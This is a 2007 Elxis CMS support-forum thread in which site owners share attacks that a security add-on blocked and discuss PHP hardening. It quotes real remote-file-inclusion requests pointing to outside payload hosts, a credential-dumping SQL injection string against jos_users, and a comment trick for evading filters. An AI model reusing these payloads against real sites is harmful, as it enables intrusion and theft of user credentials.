Elxis CMS Forum
Support => Security => Topic started by: datahell on September 30, 2007, 12:02:44
-
I saw a dangerous request today at elxis.org logs and I need to tell everyone again the importance of having register globals to off and some php functions disabled.
The request (written in 3 lines):
/index.php?topic=996.0//index.php?
_REQUEST=&_REQUEST%5boption%5d=com_login&_REQUEST%5bItemid%5d=1&
GLOBALS=&mosConfig_absolute_path=http://bsnet.web.id/safe.txt?
Exploit: http://bsnet.web.id/safe.txt
Functions used:
disk_free_space, shell_exec, exec, system, passthru, popen, getcwd
-
Ok but if we set this option to OFF some of the components may stop working.
Should we be always afraid of something or in new version (2008) something will be more safe?
-
ALL Elxis standard and Elxis compatible components work perfect with register_globals off. Elxis does not need register_globals to be on. In installation we say that very clear. Elxis 2006.x and 2008.x are safe enough but security is not only a matter of the CMS. It is also a matter of the CMS enviroment. Generally Elxis is very secure.
Elxis 2008.x has some more security enhanchements:
1. Option to hide the administration login page!
2. Elxis defender became more effective.
3. Option to log the login attemps to the administration area (successfull or not).
4. The whole frontend became more "solid" giving less privelledges to users.
5. You can control access settings for any part of the administration area.
-
Should we be always afraid ...
YES! It is wise to be cautious all the time, as you can never know what comes next in someone else's mind. And no CMS can be 100% safe, if you leave your dirs or files on 777, or your server is misconfigured, in example. Elxis is the best CMS there ever was regarding security, but hey, there are a lot of pranksters out there, and some of them are smart. ;)
-
Unfortunately there is no 100% secure application. Elxis is strong enough but we can not guarantee absolute security. Even elxis.org can theoretically be hacked. For the ones that you may not know it, joomla.org was hacked a month ago. As far as I know it was hacked due a third party component. Elxis core is very secure as we continuously work on it, update and make fixes where needed it. The most security problems are usually from third party applications and insecure site environment. So, please take a look at these, we take care of Elxis.
-
Sorry for the earlier post but I think that I saw somewhere in an installation of a component (for Elxis) that RegisterGlobals MUST be set to ON. Meaby I'm wrong. In the meantime thank you for your answer.
-
A new exploit/attack detected by Elxis Defender.
ATTACKER IP ADDRESS: 81.215.251.202
Country: Turkey (Izmir)
Exploit: http://animaliitaliani.com/x.dat?list=1&cmd=id (hosted in Italy)
Also here: http://georgiaeliteallstars.com/tool20.dat?list=1&cmd=id (hosted in USA)
DATE: 03-10-2007 01:56:57
Notice: New Elxis Defender sends you also the requested URI (if you have enabled e-mail notifications).
-
New exploit detected by Elxis defender
ATTACKER IP ADDRESS: 85.25.30.127
ATTACK TYPE: XSS
ATTACKED COMPONENT: Elxis Core
COUNTRY: Germany
EXPLOIT: http://pastebin.ca/raw/725499? (hosted in Canada)
DATE: 04-10-2007 22:08:01
Notice: If you wish to have now the new version of Elxis Defender (available in Elxis 2008.x) send me a PM to send you the new version.
I will ONLY accept requests from:
- Elxis Team members
- Elxis community members
- People having support contracts with GO UP Inc
- GO UP Inc's affiliates and partners.
-
ATTACKER IP ADDRESS: 217.65.240.14
Country: Ukraine (LVIVSKA OBLAST)
Exploit: http://usuarios.arnet.com.ar/larry123/safe.txt? (hosted in Argentina)
DATE: 05-10-2007 07:22:09
-
ATTACKER IP ADDRESS: 207.150.191.62
Country: United States (California, Dixon)
Exploit: http://www.brandy-rose.com/members/id.txt? (hosted in USA)
DATE: 05-10-2007 18:11:05
-
ATTACKER IP ADDRESS: 209.59.205.211
ATTACK TYPE: XSS
ATTACKED COMPONENT: com_mmsblog (joomla)
COUNTRY: United States (Washington, Bellevue)
EXPLOIT: http://www.kadastra.com/de/ec.txt? (hosted in Bulgaria)
DATE: 05-10-2007 21:19:15
-
ATTACKER IP ADDRESS: 74.86.55.194
ATTACK TYPE: XSS
ATTACKED COMPONENT: com_serverstat (joomla)
COUNTRY: USA (Illinois, Chicago)
EXPLOIT: http://www.brandy-rose.com/members/id.txt? (hosted in USA)
DATE: 05-10-2007 22:04:48
-
ATTACKER IP ADDRESS: 67.18.228.34
ATTACK TYPE: XSS
ATTACKED COMPONENT: com_mtree
COUNTRY: USA (Texas, Dallas)
EXPLOIT: http://tric.or.id/id.txt? (hosted in Indonesia)
DATE: 06-10-2007 02:10:04
ATTACKER IP ADDRESS: 81.214.175.110
ATTACK TYPE: XSS
ATTACKED COMPONENT: Elxis Core
COUNTRY: Turkey (Izmir)
EXPLOIT: http://animaliitaliani.com/x.dat?list=1&cmd=id (hosted in Italy)
DATE: 06-10-2007 07:22:54
-
From the kind of attacks Elxis defender blocks daily we see software that is possibly vunerable.
So, here are 3 joomla extensions with security problems:
module astatspro_show_2
bot multithumb
component ricettario (vunerable in backend too! )
We also have many attacks on component mtree and specially on the savant files (there is an elxis version available)
Having register_globals off, allow_url_fopen off or set mosConfig as a filter at Elxis defender (version 2008) makes these attacks useless.
New exploits:
http://futurehousingsystems.com/images/control.txt
http://www.dunakom.hu/userimages/id.txt
http://www.cityvoice.biz/shop/pub/_vti/safe.txt
http://www.canalhip-hop.kit.net/id.txt
ftp://132.203.200.248 ( /nod32/new )
-
Continuous attacks at www[dot]hotel-astoria[dot]gr today
# IP Date Filters
1 66.135.32.79 [GEO 1] [GEO 2] Sunday, 21 October 2007 07:38:18 mosConfig_
2 216.22.3.3 [GEO 1] [GEO 2] Sunday, 21 October 2007 07:42:04 mosConfig_
3 211.202.2.55 [GEO 1] [GEO 2] Sunday, 21 October 2007 08:08:58 mosConfig_
Two from usa and one from korea .
-
Καλησπέρα
και εμένα το σύστημα δέχεται συνέχεια επιθέσεις:
...
229 62.2.177.147 [GEO 1] [GEO 2] Tuesday, 23 October 2007 13:05:18 mosConfig_
230 62.2.177.147 [GEO 1] [GEO 2] Tuesday, 23 October 2007 13:05:18 mosConfig_
231 219.94.145.104 [GEO 1] [GEO 2] Tuesday, 23 October 2007 13:05:50 mosConfig_
232 219.94.145.104 [GEO 1] [GEO 2] Tuesday, 23 October 2007 13:05:51 mosConfig_
233 219.94.145.104 [GEO 1] [GEO 2] Tuesday, 23 October 2007 13:05:51 mosConfig_
234 75.0.141.110 [GEO 1] [GEO 2] Tuesday, 23 October 2007 13:11:03 mosConfig_
235 75.0.141.110 [GEO 1] [GEO 2] Tuesday, 23 October 2007 13:11:04 mosConfig_
236 75.0.141.110 [GEO 1] [GEO 2] Tuesday, 23 October 2007 13:11:04 mosConfig_
237 84.246.4.133 [GEO 1] [GEO 2] Tuesday, 23 October 2007 13:16:37 mosConfig_
238 84.246.4.133 [GEO 1] [GEO 2] Tuesday, 23 October 2007 13:16:37 mosConfig_
239 84.246.4.133 [GEO 1] [GEO 2] Tuesday, 23 October 2007 13:16:38 mosConfig_
240 211.129.152.113 [GEO 1] [GEO 2] Tuesday, 23 October 2007 13:18:37 mosConfig_
241 211.129.152.113 [GEO 1] [GEO 2] Tuesday, 23 October 2007 13:27:32 mosConfig_
242 211.129.152.113 [GEO 1] [GEO 2] Tuesday, 23 October 2007 13:27:33 mosConfig_
243 211.129.152.113 [GEO 1] [GEO 2] Tuesday, 23 October 2007 13:27:33 mosConfig_
και αυτές είναι μόνο οι σημερινές!
Επίσης τα περισσότερα adsense ads που βγαίνουν στις σελίδες (κυρίως στις php) βγάζουν διαφημίσεις σχετικά με flood, exploits κλπ
χωρίς φυσικά να υπάρχουν αντίστοιχα περιεχόμενα.
Εχετε μήπως καμμιά ιδέα για το πως μπορεί να συμβαίνει κάτι τέτοιο; και πως θα διορθωθεί, εννοείται!
-
OK, here is my list for this week:
# IP Date Filters
1 67.15.4.93 [GEO 1] [GEO 2] Saturday, 20 October 2007 21:09:52 mosConfig_
2 67.15.4.93 [GEO 1] [GEO 2] Saturday, 20 October 2007 21:09:59 mosConfig_
3 69.41.238.2 [GEO 1] [GEO 2] Saturday, 20 October 2007 21:12:42 mosConfig_
4 80.148.52.75 [GEO 1] [GEO 2] Wednesday, 24 October 2007 23:08:35 mosConfig_
5 199.233.91.129 [GEO 1] [GEO 2] Wednesday, 24 October 2007 23:09:20 mosConfig_
6 66.135.41.203 [GEO 1] [GEO 2] Wednesday, 24 October 2007 23:10:09 mosConfig_
7 199.233.91.129 [GEO 1] [GEO 2] Thursday, 25 October 2007 00:01:48 mosConfig_
8 80.148.52.75 [GEO 1] [GEO 2] Thursday, 25 October 2007 00:02:38 mosConfig_
9 66.135.41.203 [GEO 1] [GEO 2] Thursday, 25 October 2007 00:02:43 mosConfig_
And yes, I forgot, this is a list for elxis-srbija.org
-
Why I see a second attack from the same IP after a while? You have nt enabled block ips?
The most important in the logs is in the defender notification e-mail, the requested uri (2008 version). From that url we can see what component they try to attack.
-
I did not enable block IP, because once Defender blocked me. :D
PS
Here is the mail I got this morning:
Do not reply to this e-mail
This is a notification e-mail from Elxis Defender
Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 201.34.32.66
Requested URI: /index.php?option=com_content&task=view&id=46&Itemid=9/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.tcm-jaeggi.ch/id.txt?
DATE: 25-10-2007 08:16:59
Attack was logged
Note: Elxis Defender wont send you another notification for the next 5 minutes even if more attacks occured.
---------------------------------------------------
ELXIS DEFENDER by ELXIS Team
---------------------------------------------------
-
I post this because it was the first time someone tried to attack Elxis tool! Message from defender follows:
Do not reply to this e-mail
This is a notification e-mail from Elxis Defender
Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 200.31.197.181 (blocked)
Requested URI: /index.php?option=com_content&task=section&id=3&Itemid=32/administrator/tools/floodblocker/language/english.php?mosConfig_absolute_path=http://www.unad.edu.co/induccion/site/modules/pr.txt??
DATE: 05-11-2007 15:19:56
Attack was logged
Note: Elxis Defender wont send you another notification for the next 5 minutes even if more attacks occured.
---------------------------------------------------
ELXIS DEFENDER by ELXIS Team
---------------------------------------------------
My question is: Is mosConfig_ filter enough to protect components and tools? I think that every attack on a compoonent, mambot etc. MUST have mosConfig envolved. Corect me if I'm wrong?
-
These attackers are just script kiddies. They know nothing about hacking. They use pre-made scripts and make blind attacks to huge lists of sites trying to find security holes and insecure site enviroments. 99,9% of these attacks are get intercepted by a simple "mosconfig" filter. Elxis defender (especially the 2008 version) does its job perfectly. As real hackers also exist, and may someone try to hack (for reasons I really don't understand) your own site, make sure to take via the Elxis database manager a full database backup regulary. For every action there is a re-action, so absolute security does not exist...
-
Yes, I that's what I believe, too. If one man invents a lock, there must be another man to invent a lockpick. No particular reason. I consider the fact that someone has written a script to attack Elxis tool as a compliment to Elxis. :D
-
Hallo from me.
This is what I saw when Ia activated Elxis Defender!!!
And this in only 3 days.
Think in a year!!!
# IP Ημερομηνία Φίλτρα
1 83.149.87.190 [GEO 1] [GEO 2] Σάββατο, 03 Νοέμβριος 2007 15:40:07 mosConfig_
2 83.149.87.190 [GEO 1] [GEO 2] Σάββατο, 03 Νοέμβριος 2007 15:40:07 mosConfig_
3 200.31.197.181 [GEO 1] [GEO 2] Δευτέρα, 05 Νοέμβριος 2007 16:20:07 mosConfig_
4 200.31.197.181 [GEO 1] [GEO 2] Δευτέρα, 05 Νοέμβριος 2007 16:20:10 mosConfig_
5 200.31.197.181 [GEO 1] [GEO 2] Δευτέρα, 05 Νοέμβριος 2007 16:34:17 mosConfig_
6 200.31.197.181 [GEO 1] [GEO 2] Δευτέρα, 05 Νοέμβριος 2007 16:34:19 mosConfig_
7 64.118.86.20 [GEO 1] [GEO 2] Δευτέρα, 05 Νοέμβριος 2007 16:37:59 mosConfig_
8 64.118.86.20 [GEO 1] [GEO 2] Δευτέρα, 05 Νοέμβριος 2007 16:38:05 mosConfig_
(83.149.87.190) is located in Marina Del Rey, California, United States
(200.31.197.181) is located in Australia.
(64.118.86.20) is located in Australia.
I blocked them (I believe so)!!!
-
:D You got yor self a new spammer!
-
I get about 20 messages by Elxis defender per day only from elxis.org...
-
I figured that all this attacks come from some kids most probably, but I am surprised that of all my 10 Elxis sites, only elxis-srbija.org is attacked 5-6 times a day. ???
-
1. ATTACKER IP ADDRESS: 69.65.104.116
Country: USA - Washington DC
Exploit: /index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,concat(char(117,117,117,117,117,58),username,char(112,112,112,112,112,58),password,char(117,116,121,112,101,58),usertype,char(101,109,97,105,108,58),email,char(101,110,100,117,117,58)),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/jos_users/*DATE: 07-11-2007 11:36:24
2. ATTACKER IP ADDRESS: 58.65.198.122
Country: Karachi in Pakistan
Exploit: /index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,concat(char(117,117,117,117,117,58),username,char(112,112,112,112,112,58),password,char(117,116,121,112,101,58),usertype,char(101,109,97,105,108,58),email,char(101,110,100,117,117,58)),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/jos_users/*DATE: 07-11-2007 11:31:16
3. ATTACKER IP ADDRESS: 193.188.77.2
Country: Ar Ruşayfah in Jordanian
Exploit: /index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,concat(char(117,117,117,117,117,58),username,char(112,112,112,112,112,58),password,char(117,116,121,112,101,58),usertype,char(101,109,97,105,108,58),email,char(101,110,100,117,117,58)),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/jos_users/*DATE: 07-11-2007 11:48:49
All blocked from Elxis Defender
-
These were sql injection attempts to component simplefaq (joomla). Notice the asterisk comments ( /**/ ). In mysql you can add comments inside a query. This way hackers try to confuse blocking scripts. For example instead of writing "union select" they write "union /**/ select" which is exactly the same for mysql but very difficult to be detected and blocked. If we add a "select" filter in Elxis Defender there is the possibility to block ourseleves if we write the word "select" in a post. So we try to use words that are mysql specific like "concat", "benchmark", "drop" and "elx_". We could also use the "union", "char" or "join" filters but we should remember these filters when we write an article and either dont use them or temporary disable defender.
-
ATTACKER IP ADDRESS: 219.93.178.162 (blocked)
Requested URI: /index2.php?option=com_contact&task=vcard&contact_id=4&no_html=http://www.10namicro.com/demo/project/lib/adodb/guxav/qenahey/DATE: 23-11-2007 04:45:43
ATTACKER IP ADDRESS: 85.214.26.131
Requested URI: ADODB
DATE: 23-11-2007 00:48:51
ATTACKER IP ADDRESS: 217.144.201.107 (blocked)
Requested URI: /index.php?option=com_content&task=blogsection&id=0&Itemid=92&limit=http://www.10namicro.com/demo/project/lib/adodb/guxav/qenahey/&limitstart=75DATE: 22-11-2007 23:29:51
-
Very similar attack happened to me.... I have added =http to the filter list, and hopefully, this will stop this kind of attacks.
-
If you have allow_url_fopen to off in your php settings these attacks are useless.
-
Yes, but my hosting server is configured to have allow_url_fopen to on. So, I hope that adding =http filter to Elxis Defender should solve this. Otherwise, I must call administrator to turn it off.